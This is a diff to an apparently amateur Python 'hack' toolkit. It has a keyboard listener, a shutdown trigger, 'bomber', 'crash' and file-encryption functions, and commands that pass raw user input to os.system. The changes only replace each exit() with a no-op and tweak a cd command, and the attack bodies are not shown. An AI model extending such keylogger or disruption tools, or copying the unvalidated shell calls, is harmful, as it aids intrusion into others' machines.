@@ -13,7 +13,7 @@ def pip_install():
         os.system('pip install pygame')
         a = input('       ')
         if a == 'stop':
-            exit()
+            a = a
 class hack:
     import time
     print('>>> ...')
@@ -42,7 +42,7 @@ class hack:
                     with Listener(on_press = onPressed) as listener:
                         listener.join()
             if a == 'stop':
-                exit()
+                a = a
     def sh_win():
         import os
         a = input('       ')
@@ -51,7 +51,7 @@ class hack:
                 os.system('shutdown -i')
                 a = input('       ')
             if a == 'stop':
-                exit()
+                a = a
     def bomber():
         import os
         a = input('       ')
@@ -144,7 +144,7 @@ class hack:
                         print(colored("error!", 'red'))
                     a = input('    ')
             if a == 'stop':
-                exit()
+                a = a
     def encrypt_the_file_txt():
         import os
         a = input('       ')
@@ -166,7 +166,7 @@ class hack:
                 finally: 
                 	print("---------------------------------------------------------------")
             if a == 'stop':
-                exit()
+                a = a
     def ZAR_encrypt_the_file_txt():
         import os
         a = input('       ')
@@ -186,7 +186,7 @@ class hack:
                 finally: 
                     print("---------------------------------------------------------------")
             if a == 'stop':
-                exit()
+                a = a
     def crash():
         a = input('       ')
         if a == 'start':
@@ -301,7 +301,7 @@ class cmd():
             print('XCOPY          Копирует файлы и деревья папок.')
             print('WMIC           Отображает сведения об инструментарии WMI в интерактивной командной оболочке.')
         if a == 'stop':
-            exit()
+            a = a
     def start_command():
         a = input('       ')
         if a == 'start':
@@ -309,18 +309,19 @@ class cmd():
             a = input('       ')
             os.system(a)
         if a == 'stop':
-            exit()
+            a = a
     def cmd():
         import os
         a = input('       ')
         if a == "start":
             os.startfile('cmd')
         if a == 'stop':
-            exit()
+            a = a
     def cd():
+        a = input('       ')
         if a == 'start':
             import os
             a = input('       ')
-            os.system('cd' + a)
+            os.system('cd ' + a)
         if a == 'stop':
-            exit()
\ No newline at end of file
+            a = a
\ No newline at end of file
